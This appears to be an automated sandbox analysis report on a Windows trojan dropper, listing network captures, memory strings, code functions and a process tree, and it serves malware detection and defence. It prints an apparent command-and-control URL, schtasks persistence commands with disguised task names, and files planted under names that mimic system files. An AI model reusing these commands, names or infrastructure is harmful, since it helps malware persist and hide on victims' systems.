                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: Memory Compression.exe, 00000025.00000002.1821172623.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://797441cm.n9shteam2.top
                          Source: Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://797441cm.n9shteam2.top/
                          Source: Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://797441cm.n9shteam2.top/Videouploads.php
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredI
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
Code function: 4_2_00007FF6C035C300: CreateFileW, CloseHandle, wcscpy, wcscpy, wcscpy, wcscpy, CreateFileW, DeviceIoControl, CloseHandle, GetLastError, RemoveDirectoryW, DeleteFileW, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn, _invalid_parameter_noinfo_noreturn

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File created: c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File deleted: C:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B3F9407_2_00007FF720B3F940
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B5CE087_2_00007FF720B5CE08
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B51EA07_2_00007FF720B51EA0
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B35E2C7_2_00007FF720B35E2C
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B5B1107_2_00007FF720B5B110
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B521507_2_00007FF720B52150
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B3A2FC7_2_00007FF720B3A2FC
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B3C3007_2_00007FF720B3C300
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B372887_2_00007FF720B37288
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B412247_2_00007FF720B41224
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B553707_2_00007FF720B55370
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4B4F07_2_00007FF720B4B4F0
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B724D07_2_00007FF720B724D0
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B376C07_2_00007FF720B376C0
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B6C7B87_2_00007FF720B6C7B8
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B538E47_2_00007FF720B538E4
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B348407_2_00007FF720B34840
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B41A007_2_00007FF720B41A00
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B6FA147_2_00007FF720B6FA14
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B689207_2_00007FF720B68920
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4C9287_2_00007FF720B4C928
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B31AA47_2_00007FF720B31AA4
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B75A787_2_00007FF720B75A78
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B52A307_2_00007FF720B52A30
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B68B9C7_2_00007FF720B68B9C
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B54B187_2_00007FF720B54B18
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B45B207_2_00007FF720B45B20
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4BB4C7_2_00007FF720B4BB4C
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B52CD87_2_00007FF720B52CD8
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B58D747_2_00007FF720B58D74
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B606D47_2_00007FF720B606D4
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4AED47_2_00007FF720B4AED4
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B720007_2_00007FF720B72000
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4F1007_2_00007FF720B4F100
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BA20D478_2_00007FFD9BA20D47
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BA20E438_2_00007FFD9BA20E43
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE265F28_2_00007FFD9BE265F2
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE191198_2_00007FFD9BE19119
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE1B8F28_2_00007FFD9BE1B8F2
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE258468_2_00007FFD9BE25846
                          Source: C:\Chaindriver.exeCode function: 34_2_00007FFD9BA00D4734_2_00007FFD9BA00D47
                          Source: C:\Chaindriver.exeCode function: 34_2_00007FFD9BA00E4334_2_00007FFD9BA00E43
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA091E935_2_00007FFD9BA091E9
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA0920035_2_00007FFD9BA09200
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA1173B35_2_00007FFD9BA1173B
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA3200435_2_00007FFD9BA32004
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA3A2E435_2_00007FFD9BA3A2E4
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA3E18635_2_00007FFD9BA3E186
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA00D4735_2_00007FFD9BA00D47
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA00E4335_2_00007FFD9BA00E43
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA00D4736_2_00007FFD9BA00D47
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA00E4336_2_00007FFD9BA00E43
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA1173B36_2_00007FFD9BA1173B
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA091E936_2_00007FFD9BA091E9
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA0920036_2_00007FFD9BA09200
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA3200436_2_00007FFD9BA32004
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA3A2E436_2_00007FFD9BA3A2E4
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA3E18636_2_00007FFD9BA3E186
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9B9F0D4737_2_00007FFD9B9F0D47
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9B9F0E4337_2_00007FFD9B9F0E43
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9BDEC4F537_2_00007FFD9BDEC4F5
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA00D4738_2_00007FFD9BA00D47
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA00E4338_2_00007FFD9BA00E43
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA091E938_2_00007FFD9BA091E9
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA0920038_2_00007FFD9BA09200
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA3200438_2_00007FFD9BA32004
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA3A2E438_2_00007FFD9BA3A2E4
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA3E18638_2_00007FFD9BA3E186
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA1173B38_2_00007FFD9BA1173B
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA5200439_2_00007FFD9BA52004
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA5A2E439_2_00007FFD9BA5A2E4
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA5E18639_2_00007FFD9BA5E186
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA3173039_2_00007FFD9BA31730
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA20D4739_2_00007FFD9BA20D47
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA20E4339_2_00007FFD9BA20E43
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA2920039_2_00007FFD9BA29200
                          Source: C:\Chaindriver.exeCode function: 42_2_00007FFD9B9E0D4742_2_00007FFD9B9E0D47
                          Source: C:\Chaindriver.exeCode function: 42_2_00007FFD9B9E0E4342_2_00007FFD9B9E0E43
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 48_2_00007FFD9BA10D4748_2_00007FFD9BA10D47
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 48_2_00007FFD9BA10E4348_2_00007FFD9BA10E43
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: String function: 00007FF652ED2B10 appears 47 times
Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepython39.dll. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_decimal.pyd. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1655768186.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe | Binary or memory string: OriginalFilename vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000001.00000003.1664258544.0000023EBC6EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000001.00000003.1664219894.0000023EBC6ED000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000001.00000002.1666043288.0000023EBC6F1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000001.00000002.1668568609.00007FFDFBAA0000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFilenamepython39.dll. vs t8F7Ic986c.exe
Source: t8F7Ic986c.exe, 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs t8F7Ic986c.exe
Source: Chaindriver.exe.7.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Memory Compression.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RuntimeBroker.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NOFqHeDosUIopsPGLT.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NOFqHeDosUIopsPGLT.exe0.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@63/47@1/1
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652ED8770 GetLastError,FormatMessageW,WideCharToMultiByte
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C03785A4 FindResourceExW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Chaindriver.exe | File created: C:\Users\user\Desktop\viEjRGTv.log
Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Recovery\Memory Compression.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-hfvbr7qWOm1XHEAbKVKA
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1740:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75042
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\1.bat" "
Source: t8F7Ic986c.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Chaindriver.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeFile read: C:\Windows\win.iniJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: t8F7Ic986c.exeReversingLabs: Detection: 47%
                          Source: t8F7Ic986c.exeVirustotal: Detection: 61%
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile read: C:\Users\user\Desktop\t8F7Ic986c.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\t8F7Ic986c.exe "C:\Users\user\Desktop\t8F7Ic986c.exe"
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeProcess created: C:\Users\user\Desktop\t8F7Ic986c.exe "C:\Users\user\Desktop\t8F7Ic986c.exe"
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\1.bat" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Chaindriver.sfx.exe Chaindriver.sfx.exe -p1234
                          Source: C:\Chaindriver.sfx.exeProcess created: C:\Chaindriver.exe "C:\Chaindriver.exe"
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 10 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 12 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"
